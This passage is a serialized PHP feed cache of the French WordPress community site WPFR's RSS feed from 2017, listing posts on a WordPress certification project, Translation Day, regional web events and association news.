contributions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/UUGDJmDzVjE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wpfr.net/certification-wordpress-wpfr-appel-contributions/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 Oct 2017 06:46:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1931227\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1508:\"Le chantier lié à la mise en place d&#8217;une certification WordPress accessible via le Compte Personnel de Formation (CPF) et enregistré auprès du Registre National des Certifications Professionnelles (RNCP) est en marche. Ce dernier est mené par Maxime Bernard-Jacquet avec nous l&#8217;espérons des résultats concrets pour 2018. Cette mission a été relancée lors de la<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=UUGDJmDzVjE:jTMHK5CfDEs:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=UUGDJmDzVjE:jTMHK5CfDEs:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/UUGDJmDzVjE\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wpfr.net/certification-wordpress-wpfr-appel-contributions/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wpfr.net/certification-wordpress-wpfr-appel-contributions/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"Le 30 septembre, c’est le WordPress Translation Day 2017 !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/PgJgl5KXQwk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://wpfr.net/le-30-septembre-cest-le-wordpress-translation-day-2017/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 12 Sep 2017 12:03:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:10:\"traduction\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1883236\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1488:\"Le troisième WordPress Translation Day aura lieu le 30 septembre 2017 ! Le 30/09 se déroulera un marathon mondial de 24 heures dédié à la traduction et à la localisation de la plate-forme WordPress et de son écosystème : thèmes, extensions, applications… Organisé par l&#8217;équipe WordPress Polyglots dont la mission est de traduire WordPress dans<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=PgJgl5KXQwk:7QgDYesvNPg:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=PgJgl5KXQwk:7QgDYesvNPg:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/PgJgl5KXQwk\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wpfr.net/le-30-septembre-cest-le-wordpress-translation-day-2017/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wpfr.net/le-30-septembre-cest-le-wordpress-translation-day-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"#GEN5, l’évènement numérique du grand-Est où l’on cause WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/POlUtKLV2DI/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wpfr.net/gen5-evenement-numerique-wordpress/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Sep 2017 11:59:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1860285\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1488:\"La 5e édition de Grand-Est Numérique ou #GEN5 aura lieu les 21 et 22 septembre 2017 au Centre Foire et Congrès de Metz. Cet évènement réservé aux professionnels du numérique nous propose un programme de conférences, tables rondes et autres ateliers participatifs. Deux sessions autour de WordPress vous seront proposées par votre humble serviteur. WPFR<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=POlUtKLV2DI:D5WhSR95RJY:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=POlUtKLV2DI:D5WhSR95RJY:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/POlUtKLV2DI\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/gen5-evenement-numerique-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wpfr.net/gen5-evenement-numerique-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"BlendWebMix 2017 : WPFR est partenaire !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/WzJcLpFnZ7Q/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wpfr.net/blendwebmix-2017-wpfr-partenaire/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 16 Aug 2017 10:00:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1780344\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1513:\"Le BlendWebMix 2017 aura lieu les 26 et 27 octobre 2017 à Lyon. Pour l&#8217;occasion, WPFR vous propose une billetterie communautaire pour vous faire profiter de tarifs avantageux. Le BlendWebMix est un évènement Web similaire aux WordCamps organisés par la communauté WordPress. Elle rassemble des orateurs talentueux aux multiples compétences Web qui vous feront partager leurs<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=WzJcLpFnZ7Q:LaqrXUsOGtI:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=WzJcLpFnZ7Q:LaqrXUsOGtI:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/WzJcLpFnZ7Q\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wpfr.net/blendwebmix-2017-wpfr-partenaire/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wpfr.net/blendwebmix-2017-wpfr-partenaire/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"Compte rendu de la réunion du 10 juillet 2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/HOXhXbdFR7A/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 03 Aug 2017 06:22:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Association\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1689645\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1481:\"Présents : Xavier Borderie, Benoît Catherineau et Aurélien Denis L’ordre du jour Les finances Actions en cours et à venir Questions diverses Aurélien Denis, Président, ouvre la séance en rappelant que l&#8217;association compte à ce jour 225 membres à jour de leur cotisation. Il passe la parole à Xavier pour parler des finances. Les finances<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=HOXhXbdFR7A:_7ilDV_EV8s:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=HOXhXbdFR7A:_7ilDV_EV8s:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/HOXhXbdFR7A\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wpfr.net/compte-rendu-reunion-10-juillet-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"Les résultats du grand sondage de la communauté francophone de WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/_z7qQytCHB8/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://wpfr.net/resultats-grand-sondage-de-communaute-francophone-de-wordpress/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 12:52:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:7:\"Brèves\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"WordPress 